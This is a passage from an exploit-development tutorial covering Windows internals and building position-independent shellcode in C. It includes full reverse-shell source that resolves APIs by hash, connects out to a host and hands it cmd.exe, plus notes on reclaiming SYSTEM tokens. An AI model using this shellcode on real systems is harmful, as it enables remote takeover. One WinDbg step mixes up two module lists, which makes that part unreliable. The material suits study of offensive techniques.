
# Exploit Development Tutorial Series: Windows Basics & Shellcode

Source: http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/

Windows Basics
==============

* * *

### 0x00 Windows Basics

This article briefly covers some facts that every Windows developer should know.

### 0x01 Win32 API

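The main Windows API is provided by several DLLs (`Dynamic Link Libraries`). An application imports functions from those DLLs and calls them. Because applications go through these DLLs instead of calling the kernel directly, ordinary user-mode applications stay portable across Windows versions.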

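### 0x02 PE File Format

Executables and DLLs are PE (`Portable Executable`) files. Each PE contains an import table and an export table. The import table specifies the functions to import and the files (modules) they live in. The export table specifies the exported functions, i.e. the functions that other PE files can import.

A PE file is made up of several sections (code, data, and so on). The `.reloc` section holds the information needed to relocate the executable or DLL in memory. Some addresses in the code are relative (for example those of relative `jmp` instructions), but many are absolute and depend on where the module is loaded.

The Windows loader searches for DLLs starting from the current working directory, so an application can ship with a DLL that differs from the one in the system directory (`\windows\system32`). The resulting version incompatibilities are what some people call `DLL-hell`.

An important concept is the Relative Virtual Address (`RVA`). PE files use RVAs to specify positions relative to the base address of the module. In other words, if a module is loaded at address B (the base address) and an element of that module has RVA X, then the Virtual Address (`VA`) of that element is `B+X`.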
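The relation between base address, RVA and VA can be written down in a couple of lines. This is only a minimal sketch; the base address and RVA used below are made-up values, not taken from a real module.

```python
def rva_to_va(base: int, rva: int) -> int:
    """Return the virtual address of an element, given the module base and its RVA."""
    return base + rva


def va_to_rva(base: int, va: int) -> int:
    """Inverse operation: recover the RVA from a virtual address."""
    return va - base


# Hypothetical module loaded at 0x400000 with an element at RVA 0x1000.
va = rva_to_va(0x400000, 0x1000)
print(hex(va))
```

If the same module were loaded at a different base, only `base` would change; the RVA stored in the PE file stays the same.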

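### 0x03 Threads

If you are used to Windows, you already know threads well. If you come from Linux, keep in mind that Windows gives CPU time slices to threads. You create new processes with `CreateProcess()` and new threads with `CreateThread()`. Threads execute within the address space of the process they belong to, so they share memory.

Threads also have limited support for non-shared memory through a mechanism called TLS (`Thread Local Storage`).

Basically, the `TEB` of each thread contains a main `TLS` array of 64 `DWORD` values, plus an optional `TLS` array of up to 1024 `DWORD` values that is allocated when the main array runs out of free slots. First, an index corresponding to a position in one of the two arrays must be reserved with `TlsAlloc()`, which returns the index. A `DWORD` can then be read with `TlsGetValue(index)` and written with `TlsSetValue(index, newValue)`. For example, `TlsGetValue(7)` reads the `DWORD` at index 7 of the `TLS` array in the `TEB` of the current thread.

Note: we could emulate this mechanism using `GetCurrentThreadId()`, but it would not be as efficient.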
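The idea of per-thread storage inside a shared address space can be illustrated with Python's `threading.local`. This is only an analogy, not the Windows mechanism itself: the comments map each step to the Win32 call it loosely resembles, and the names `worker` and `results` are made up for the example.

```python
import threading

tls = threading.local()   # every thread sees its own attributes on this object
results = {}              # ordinary shared memory, visible to all threads


def worker(name, value):
    tls.slot = value              # loosely comparable to TlsSetValue(index, value)
    results[name] = tls.slot      # loosely comparable to TlsGetValue(index)


threads = [threading.Thread(target=worker, args=("t%d" % i, i * 10)) for i in range(3)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(results)
```

Each thread reads back only the value it stored itself, while `results` is shared by all of them, which mirrors the shared versus non-shared distinction described above.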

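### 0x04 Tokens

Tokens represent access rights. Like file handles, tokens are just 32-bit integers. Each process maintains an internal structure that holds the access-rights information associated with its tokens.

There are two types of tokens: primary tokens and impersonation tokens. Whenever a process is created, it is assigned a primary token. Each thread of that process can use the process's token or obtain an impersonation token from another process. Depending on the logon type (for example `LOGON32_LOGON_NETWORK`), `LogonUser()`, which is called with credentials, returns an impersonation token that cannot be passed to `CreateProcessAsUser()` unless you first call `DuplicateTokenEx()` to convert it into a primary token.

A token can be attached to the current thread with `SetThreadToken(newToken)` and removed with `RevertToSelf()`, which makes the thread revert to the primary token.

Consider a user who connects to a server on Windows and sends a username and password. The server, running as `SYSTEM`, calls `LogonUser()` with the supplied credentials and, on success, receives a new token. The server then creates a new thread, and that thread calls `SetThreadToken(new_token)`, where `new_token` is the token returned by `LogonUser()`. From then on the thread executes with the same privileges as the user. When the thread has finished serving the client, it is either destroyed, or it calls `RevertToSelf()` and is added to the pool of free threads.

If you can take control of the server, you can restore the `SYSTEM` privileges of the current thread by calling `RevertToSelf()`, or by looking for other tokens in memory and attaching them to the current thread with `SetThreadToken()`.

Note that `CreateProcess()` uses the primary token as the token of the new process. This is a problem when the thread that calls `CreateProcess()` holds an impersonation token with more privileges than the primary token: the new process ends up with fewer privileges than the thread that created it.

The solution is to create a new primary token from the current thread's impersonation token with `DuplicateTokenEx()`, and then create the new process by calling `CreateProcessAsUser()` with the new primary token.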

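Shellcode
=========

* * *

### 0x00 Introduction

Shellcode is a piece of code sent as the `payload` of an `exploit`; it is injected into the vulnerable application and executed there. Shellcode is self-contained and should not contain `null` bytes. It is usually copied with a function such as `strcpy()`, which stops copying as soon as it meets a `null` byte, so the shellcode would not be copied completely. Shellcode is normally written directly in assembly, but in this article we will develop it in `C/C++` with `Visual Studio 2013`. The benefits of this environment are:

1. Shorter development time.

2. IntelliSense.

3. Ease of debugging.

We will use `VS2013` to produce an executable that contains the shellcode, and a `Python` script to extract and fix the shellcode (i.e. remove the `null` bytes).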
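The reason `null` bytes matter can be shown with a small model of a `strcpy()`-style copy. This is a sketch for illustration only: `c_strcpy` is a hypothetical helper that mimics the stop-at-null behaviour, and the payload bytes are arbitrary.

```python
def c_strcpy(src: bytes) -> bytes:
    """Mimic strcpy(): copy bytes up to, but not including, the first null byte."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


# Arbitrary example bytes; the fifth byte is the first null.
payload = b"\x90\x90\xb8\x01\x00\x00\x00\xc3"
copied = c_strcpy(payload)

print(len(payload), len(copied))
```

Everything after the first `null` byte is lost, which is why the extraction script has to rewrite the shellcode so that it contains none.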

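### 0x01 C/C++ Code

#### Use only stack variables

To write position independent code, we must use only stack variables. This means that we cannot write

```
char *v = new char[100];
```

because that array would be allocated on the heap. Worse, this code tries to call the `new` operator function in `msvcr120.dll` through an absolute address:

```
00191000 6A 64 push 64h
00191002 FF 15 90 20 19 00 call dword ptr ds:[192090h]
```

The location `192090h` contains the address of the function. If we want to call a function imported from a library, we have to do it directly, without relying on the import table and the Windows loader. Another problem is that the `new` operator probably requires some initialization performed by the `C/C++` runtime component.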

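We cannot use global variables either:

```
int x;

int main() {
    x = 12;
}
```

The code above (if it is not optimized away) produces

```
008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov dword ptr ds:[8E9130h],0Ch
```

where `8E9130h` is the absolute address of the variable `x`.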

Strings are a problem as well. If we write

```
char str[] = "I'm a string";

printf(str);
```

the string is placed in the `.rdata` section of the executable and is referenced through an absolute address.

You must not use `printf` in shellcode: this is only an example to show how `str` is referenced.

Here is the assembly code:

```
00A71006 8D 45 F0 lea eax,[str]
00A71009 56 push esi
00A7100A 57 push edi
00A7100B BE 00 21 A7 00 mov esi,0A72100h
00A71010 8D 7D F0 lea edi,[str]
00A71013 50 push eax
00A71014 A5 movs dword ptr es:[edi],dword ptr [esi]
00A71015 A5 movs dword ptr es:[edi],dword ptr [esi]
00A71016 A5 movs dword ptr es:[edi],dword ptr [esi]
00A71017 A4 movs byte ptr es:[edi],byte ptr [esi]
00A71018 FF 15 90 20 A7 00 call dword ptr ds:[0A72090h]
```

As you can see, the string is located at address `A72100h` in the `.rdata` section and is copied onto the stack (`str` points to the stack) by the `movsd` and `movsb` instructions. Note that `A72100h` is an absolute address, so this code is clearly not position independent.

If we write

```
char *str = "I'm a string";
printf(str);
```

the string is still placed in the `.rdata` section, but it is no longer copied onto the stack:

```
00A31000 68 00 21 A3 00 push 0A32100h
00A31005 FF 15 90 20 A3 00 call dword ptr ds:[0A32090h]
```

The string is in the `.rdata` section at the absolute address `A32100h`.

How can we make this code position independent?

The simpler (partial) solution is this:

```
char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);
```

Here is the corresponding assembly code:

```
012E1006 8D 45 F0 lea eax,[str]
012E1009 C7 45 F0 49 27 6D 20 mov dword ptr [str],206D2749h
012E1010 50 push eax
012E1011 C7 45 F4 61 20 73 74 mov dword ptr [ebp-0Ch],74732061h
012E1018 C7 45 F8 72 69 6E 67 mov dword ptr [ebp-8],676E6972h
012E101F C6 45 FC 00 mov byte ptr [ebp-4],0
012E1023 FF 15 90 20 2E 01 call dword ptr ds:[12E2090h]
```

Apart from the call to `printf`, this code is position independent, because the pieces of the string are encoded directly in the source operands of the `mov` instructions. Once the string has been built on the stack, it can be used.
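To see where the immediates in the listing come from, the string can be split into little-endian dwords. The helper below is a sketch written for this explanation (`string_to_dwords` is not part of the original tooling); it pads the input to a multiple of four bytes.

```python
import struct


def string_to_dwords(data: bytes):
    """Split a byte string into little-endian 32-bit values, padding with nulls."""
    padded = data + b"\x00" * (-len(data) % 4)
    return [struct.unpack_from("<I", padded, i)[0] for i in range(0, len(padded), 4)]


dwords = string_to_dwords(b"I'm a string")
print([hex(d) for d in dwords])
```

The three values match the operands `206D2749h`, `74732061h` and `676E6972h` of the `mov` instructions above; the terminating null is stored separately by the final `mov byte ptr`.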

Unfortunately, this approach stops working once the string reaches a certain length. The code

```
char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 'v', 'e', 'r', 'y', ' ', 'l', 'o', 'n', 'g', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);
```

produces

```
013E1006 66 0F 6F 05 00 21 3E 01 movdqa xmm0,xmmword ptr ds:[13E2100h]
013E100E 8D 45 E8 lea eax,[str]
013E1011 50 push eax
013E1012 F3 0F 7F 45 E8 movdqu xmmword ptr [str],xmm0
013E1017 C7 45 F8 73 74 72 69 mov dword ptr [ebp-8],69727473h
013E101E 66 C7 45 FC 6E 67 mov word ptr [ebp-4],676Eh
013E1024 C6 45 FE 00 mov byte ptr [ebp-2],0
013E1028 FF 15 90 20 3E 01 call dword ptr ds:[13E2090h]
```

As you can see, part of the string is now located in the `.rdata` section at address `13E2100h`, while the rest is still encoded in the source operands of the `mov` instructions as before.

The solution I came up with is to allow code like

```
char *str = "I'm a very long string";
```

and to fix the shellcode with a `Python` script. The script has to extract the referenced strings from the `.rdata` section, put them into the shellcode and fix the relocations. We will see how shortly.

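#### Don't call the Windows API directly

In our `C/C++` code we cannot write

```
WaitForSingleObject(procInfo.hProcess, INFINITE);
```

because `WaitForSingleObject` is imported from `kernel32.dll`.

In a nutshell, a `PE` file contains an import table and an Import Address Table (`IAT`). The import table holds the information about which functions are imported from which libraries. The `IAT` is filled in by the Windows loader when the executable is loaded and contains the addresses of the imported functions. The code of the executable calls imported functions through a level of indirection. For example:

```
001D100B FF 15 94 20 1D 00 call dword ptr ds:[1D2094h]
```

The address `1D2094h` is the location of the `IAT` entry that contains the address of `MessageBoxA`. This indirection is useful because the call above does not need to be fixed (unless the executable is relocated). The only thing the Windows loader has to fix is the `dword` at `1D2094h`, which is the address of `MessageBoxA`.

The solution is to get the addresses of the Windows functions directly from the in-memory data structures of Windows. We will see how later.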

#### Create a new project

Go to `File→New→Project…`, select `Installed→Templates→Visual C++→Win32→Win32 Console Application`, choose a name for the project (I called it `shellcode`) and click OK.

Go to `Project→Properties`; a new dialog appears. Set `Configuration` (top left of the dialog) to `All Configurations` so that the changes apply to all configurations (`Release` and `Debug`). Then expand `Configuration Properties` and, under `General`, change `Platform Toolset` to `Visual C++ Compiler Nov 2013 CTP` (CTP_Nov2013).

This lets you use some features of `C++11` and `C++14`, such as `static_assert`.

#### Shellcode example

Here is the code for a simple reverse `shell` (definition). Add a file named `shellcode.cpp` to the project and copy this code into it. Don't try to understand all of it right now; we will discuss it at length later.

```
// Simple reverse shell shellcode by Massimiliano Tomassoli (2015)
// NOTE: Compiled on Visual Studio 2013 + "Visual C++ Compiler November 2013 CTP".

#include <WinSock2.h>               // must precede #include <windows.h>
#include <WS2tcpip.h>
#include <windows.h>
#include <winnt.h>
#include <winternl.h>
#include <stddef.h>
#include <stdio.h>

#define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8))

_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}

DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}

DWORD getFunctionHash(const char *moduleName, const char *functionName) {
    return getHash(moduleName) + getHash(functionName);
}

LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {
    int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr - list_entry_offset);
}

// NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to
//       ntdll.RtlExitUserThread. The solution is to follow the forwards manually.
PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;

        BYTE *baseAddress = (BYTE *)dte->DllBase;
        if (!baseAddress)           // invalid module(???)
            continue;
        IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
        IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
        DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (!iedRVA)                // Export Directory not present
            continue;
        IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
        char *moduleName = (char *)(baseAddress + ied->Name);
        DWORD moduleHash = getHash(moduleName);

        // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
        // element of both arrays refer to the same function. The first array specifies the name whereas
        // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
        // AddressOfFunctions to find the entry point of the function.
        DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
        for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
            char *functionName = (char *)(baseAddress + nameRVAs[i]);
            if (hash == moduleHash + getHash(functionName)) {
                WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
                DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
                return baseAddress + functionRVA;
            }
        }
    } while (ptr != first);

    return NULL;            // address not found
}

#define HASH_LoadLibraryA           0xf8b7108d
#define HASH_WSAStartup             0x2ddcd540
#define HASH_WSACleanup             0x0b9d13bc
#define HASH_WSASocketA             0x9fd4f16f
#define HASH_WSAConnect             0xa50da182
#define HASH_CreateProcessA         0x231cbe70
#define HASH_inet_ntoa              0x1b73fed1
#define HASH_inet_addr              0x011bfae2
#define HASH_getaddrinfo            0xdc2953c9
#define HASH_getnameinfo            0x5c1c856e
#define HASH_ExitThread             0x4b3153e0
#define HASH_WaitForSingleObject    0xca8e9498

#define DefineFuncPtr(name)     decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)

int entryPoint() {
//  printf("0x%08x\n", getFunctionHash("kernel32.dll", "WaitForSingleObject"));
//  return 0;

    // NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
    //       they're not strictly needed.

    DefineFuncPtr(LoadLibraryA);

    My_LoadLibraryA("ws2_32.dll");

    DefineFuncPtr(WSAStartup);
    DefineFuncPtr(WSASocketA);
    DefineFuncPtr(WSAConnect);
    DefineFuncPtr(CreateProcessA);
    DefineFuncPtr(inet_ntoa);
    DefineFuncPtr(inet_addr);
    DefineFuncPtr(getaddrinfo);
    DefineFuncPtr(getnameinfo);
    DefineFuncPtr(ExitThread);
    DefineFuncPtr(WaitForSingleObject);

    const char *hostName = "127.0.0.1";
    const int hostPort = 123;

    WSADATA wsaData;

    if (My_WSAStartup(MAKEWORD(2, 2), &wsaData))
        goto __end;         // error
    SOCKET sock = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET)
        goto __end;

    addrinfo *result;
    if (My_getaddrinfo(hostName, NULL, NULL, &result))
        goto __end;
    char ip_addr[16];
    My_getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);

    SOCKADDR_IN remoteAddr;
    remoteAddr.sin_family = AF_INET;
    remoteAddr.sin_port = htons(hostPort);
    remoteAddr.sin_addr.s_addr = My_inet_addr(ip_addr);

    if (My_WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))
        goto __end;

    STARTUPINFOA sInfo;
    PROCESS_INFORMATION procInfo;
    SecureZeroMemory(&sInfo, sizeof(sInfo));        // avoids a call to _memset
    sInfo.cb = sizeof(sInfo);
    sInfo.dwFlags = STARTF_USESTDHANDLES;
    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;
    My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

    // Waits for the process to finish.
    My_WaitForSingleObject(procInfo.hProcess, INFINITE);

__end:
    My_ExitThread(0);

    return 0;
}

int main() {
    return entryPoint();
}
```
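The `htons` macro in the listing replaces the winsock function of the same name so that no import is needed. What it computes is a plain byte swap of a 16-bit value, which can be checked with the following sketch (a Python rendering written for this explanation, not part of the original code):

```python
import struct


def htons(value: int) -> int:
    """Swap the two bytes of a 16-bit value, like the htons macro in the listing."""
    value &= 0xFFFF
    return ((value & 0xFF00) >> 8) | ((value & 0x00FF) << 8)


port = htons(123)   # the port used by the example shellcode
print(hex(port))
```

On a little-endian machine such as x86, storing the swapped value puts the bytes of the port in network (big-endian) order, which is what `sin_port` expects.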

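#### Compiler configuration

Go to `Project→Properties`, expand `Configuration Properties` and then `C/C++`. Apply the changes to the `Release` configuration.

Here are the settings to change:

* General:
    * SDL Checks: No (/sdl-)

      This may not be needed, but I disabled them anyway.

* Optimization:
    * Optimization: Minimize Size (/O1)

      This is very important! We want the `shellcode` to be as small as possible.

    * Inline Function Expansion: Only __inline (/Ob1)

      This tells `VS 2013` to inline only the functions defined with `_inline`. `main()` just calls the `entryPoint` function of the `shellcode`. If `entryPoint` is short enough, it might be inlined into `main()`. That would be disastrous, because `main()` would no longer mark the end of the `shellcode` (in fact, it would contain part of it). We will see why later.

    * Enable Intrinsic Functions: Yes (/Oi)

      I don't know whether this setting should be turned off.

    * Favor Size Or Speed: Favor small code (/Os)
    * Whole Program Optimization: Yes (/GL)

* Code Generation:
    * Security Check: Disable Security Check (/GS-)

      We don't need any security checks!

    * Enable Function-Level linking: Yes (/Gy)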

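#### Linker configuration

Go to `Project→Properties`, expand `Configuration Properties` and then `Linker`. Apply the changes to the `Release` configuration. Here are the settings to change:

* General:
    * Enable Incremental Linking: No (/INCREMENTAL:NO)

* Debugging:
    * Generate Map File: Yes (/MAP)

      Tells the `linker` to generate a map file that describes the structure of the `EXE`.

    * Map File Name: mapfile

      This is the name of the map file. Choose any name you like.

* Optimization:
    * References: Yes (/OPT:REF)

      This option is very important for producing small `shellcode`, because it removes the functions and data that are never referenced by the code.

    * Enable COMDAT Folding: Yes (/OPT:ICF)
    * Function Order: function_order.txt

      This setting reads a file named `function_order.txt`, which specifies the order in which the functions must appear in the code section. We want `entryPoint` to be the first function in the code section, so `function_order.txt` contains a single line with the string `?entryPoint@@YAHXZ`. You can find the function names in the map file.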

#### getProcAddrByHash

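This function returns the address of a function exported by a module (`.exe` or `.dll`) present in memory, given the `hash` associated with the module and the function. It is certainly possible to look up functions by name, but that would waste a lot of space, because the names would have to be included in the `shellcode`. A `hash`, on the other hand, takes only 4 bytes. Since we don't use two hashes (one for the module and one for the function), `getProcAddrByHash` has to consider all the modules loaded in memory.

The `hash` for `MessageBoxA`, exported by `user32.dll`, can be computed as follows:

```
DWORD hash = getFunctionHash("user32.dll", "MessageBoxA");
```

where the result is the sum of `getHash("user32.dll")` and `getHash("MessageBoxA")`. The implementation of `getHash` is very simple:

```
DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}
```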
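For experimenting with hashes outside of Visual Studio, the same computation can be ported to Python. This is a sketch of a port, not part of the original tooling: the names `ror32`, `get_hash` and `get_function_hash` are chosen here, and the 32-bit wrap-around that `DWORD` arithmetic gives for free in C has to be applied explicitly with a mask.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def get_hash(name: str) -> int:
    """ROR-13 additive hash; characters >= 'a' are shifted down by 32, as in the C code."""
    h = 0
    for ch in name.encode("ascii"):
        h = ror32(h, 13)
        h = (h + (ch - 32 if ch >= ord("a") else ch)) & 0xFFFFFFFF
    return h


def get_function_hash(module: str, function: str) -> int:
    """Sum of the module hash and the function hash, truncated to 32 bits."""
    return (get_hash(module) + get_hash(function)) & 0xFFFFFFFF


print(hex(get_function_hash("kernel32.dll", "LoadLibraryA")))
```

A reasonable sanity check is to compare the printed value with the corresponding `HASH_` constant in the shellcode listing; the comparison is left to the reader rather than asserted here.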

As you can see, the `hash` is case-insensitive. This matters because in some versions of Windows the names in memory are all uppercase. First, `getProcAddrByHash` gets the address of the PEB (`Process Environment Block`), which it reaches through the TEB (`Thread Environment Block`):

```
PEB *peb = getPEB();
```

where

```
_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}
```

The selector `fs` is associated with a segment that starts at the address of the `TEB`. At offset `30h`, the `TEB` contains a pointer to the PEB. We can see this in WinDbg:

```
0:000> dt _TEB @$teb
ntdll!_TEB
+0x000 NtTib : _NT_TIB
+0x01c EnvironmentPointer : (null)
+0x020 ClientId : _CLIENT_ID
+0x028 ActiveRpcHandle : (null)
+0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
+0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
+0x034 LastErrorValue : 0
+0x038 CountOfOwnedCriticalSections : 0
+0x03c CsrClientThread : (null)
```

The `PEB` is associated with the current process and contains, among other things, information about the modules loaded into the address space of the process. Here is `getProcAddrByHash` again:

```
PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
        .
        .
        .
    } while (ptr != first);

    return NULL;            // address not found
}
```

Here is part of the `PEB`:

```
0:000> dt _PEB @$peb
ntdll!_PEB
+0x000 InheritedAddressSpace : 0 ''
+0x001 ReadImageFileExecOptions : 0 ''
+0x002 BeingDebugged : 0x1 ''
+0x003 BitField : 0x8 ''
+0x003 ImageUsesLargePages : 0y0
+0x003 IsProtectedProcess : 0y0
+0x003 IsLegacyProcess : 0y0
+0x003 IsImageDynamicallyRelocated : 0y1
+0x003 SkipPatchingUser32Forwarders : 0y0
+0x003 SpareBits : 0y000
+0x004 Mutant : 0xffffffff Void
+0x008 ImageBaseAddress : 0x00060000 Void
+0x00c Ldr : 0x76fd0200 _PEB_LDR_DATA
+0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
+0x014 SubSystemData : (null)
+0x018 ProcessHeap : 0x00680000 Void
```

At offset `0Ch` there is a field called `Ldr`, which points to a `PEB_LDR_DATA` structure. Let's look at it in `WinDbg`:

```
0:000> dt _PEB_LDR_DATA 0x76fd0200
ntdll!_PEB_LDR_DATA
+0x000 Length : 0x30
+0x004 Initialized : 0x1 ''
+0x008 SsHandle : (null)
+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
+0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]
+0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]
+0x024 EntryInProgress : (null)
+0x028 ShutdownInProgress : 0 ''
+0x02c ShutdownThreadId : (null)
```

`InMemoryOrderModuleList` is a doubly-linked list of `LDR_DATA_TABLE_ENTRY` structures associated with the modules loaded into the address space of the current process. To be precise, `InMemoryOrderModuleList` is a `LIST_ENTRY`, which contains two fields:

```
0:000> dt _LIST_ENTRY
ntdll!_LIST_ENTRY
+0x000 Flink : Ptr32 _LIST_ENTRY
+0x004 Blink : Ptr32 _LIST_ENTRY
```

`Flink` is the forward link and `Blink` the backward link. `Flink` points to the `LDR_DATA_TABLE_ENTRY` of the first module. Well, not exactly: `Flink` points to a `LIST_ENTRY` structure contained in the `LDR_DATA_TABLE_ENTRY` structure.

Let's see how `LDR_DATA_TABLE_ENTRY` is defined:

```
0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY
+0x008 InMemoryOrderLinks : _LIST_ENTRY
+0x010 InInitializationOrderLinks : _LIST_ENTRY
+0x018 DllBase : Ptr32 Void
+0x01c EntryPoint : Ptr32 Void
+0x020 SizeOfImage : Uint4B
+0x024 FullDllName : _UNICODE_STRING
+0x02c BaseDllName : _UNICODE_STRING
+0x034 Flags : Uint4B
+0x038 LoadCount : Uint2B
+0x03a TlsIndex : Uint2B
+0x03c HashLinks : _LIST_ENTRY
+0x03c SectionPointer : Ptr32 Void
+0x040 CheckSum : Uint4B
+0x044 TimeDateStamp : Uint4B
+0x044 LoadedImports : Ptr32 Void
+0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT
+0x04c PatchInformation : Ptr32 Void
+0x050 ForwarderLinks : _LIST_ENTRY
+0x058 ServiceTagLinks : _LIST_ENTRY
+0x060 StaticLinks : _LIST_ENTRY
+0x068 ContextInformation : Ptr32 Void
+0x06c OriginalBase : Uint4B
+0x070 LoadTime : _LARGE_INTEGER
```

`InMemoryOrderModuleList.Flink` points to `_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks`, which is at offset 8, so we must subtract 8 to get the address of the `_LDR_DATA_TABLE_ENTRY`.
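The "subtract the offset of the embedded link" step is what `getDataTableEntry` does with `offsetof`. The sketch below models only the first four fields of the 32-bit layout shown by WinDbg using `ctypes`; the class names and the helper `entry_from_memory_order_link` are made up for this illustration.

```python
import ctypes


class ListEntry32(ctypes.Structure):
    # 32-bit LIST_ENTRY: two 4-byte pointers.
    _fields_ = [("Flink", ctypes.c_uint32), ("Blink", ctypes.c_uint32)]


class LdrDataTableEntry32(ctypes.Structure):
    # Only the leading fields of the 32-bit _LDR_DATA_TABLE_ENTRY layout.
    _fields_ = [
        ("InLoadOrderLinks", ListEntry32),
        ("InMemoryOrderLinks", ListEntry32),
        ("InInitializationOrderLinks", ListEntry32),
        ("DllBase", ctypes.c_uint32),
    ]


def entry_from_memory_order_link(link_addr: int) -> int:
    """Address of the enclosing entry, given a pointer to its InMemoryOrderLinks field."""
    return link_addr - LdrDataTableEntry32.InMemoryOrderLinks.offset


# 0x683088 is InMemoryOrderModuleList.Flink in the PEB_LDR_DATA dump.
print(hex(entry_from_memory_order_link(0x683088)))
```

Computing the offset from the structure definition, rather than hard-coding 8, keeps the calculation tied to the layout it depends on.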

First, let's get the `Flink` pointer:

```
+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
```

Its value is `0x683080`, so the `_LDR_DATA_TABLE_ENTRY` structure is at address `0x683080 - 8 = 0x683078`:

```
0:000> dt _LDR_DATA_TABLE_ENTRY 683078
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]
+0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]
+0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]
+0x018 DllBase : (null)
+0x01c EntryPoint : (null)
+0x020 SizeOfImage : 0x60000
+0x024 FullDllName : _UNICODE_STRING "蒮ｍ쿟ﾹ엘ﾬ膪ｎ???"
+0x02c BaseDllName : _UNICODE_STRING "C:\Windows\SysWOW64\calc.exe"
+0x034 Flags : 0x120010
+0x038 LoadCount : 0x2034
+0x03a TlsIndex : 0x68
+0x03c HashLinks : _LIST_ENTRY [ 0x4000 - 0xffff ]
+0x03c SectionPointer : 0x00004000 Void
+0x040 CheckSum : 0xffff
+0x044 TimeDateStamp : 0x6841b4
+0x044 LoadedImports : 0x006841b4 Void
+0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
+0x04c PatchInformation : 0x4ce7979d Void
+0x050 ForwarderLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
+0x058 ServiceTagLinks : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]
+0x060 StaticLinks : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]
+0x068 ContextInformation : 0x00686418 Void
+0x06c OriginalBase : 0x6851a8
+0x070 LoadTime : _LARGE_INTEGER 0x76f0c9d0
```

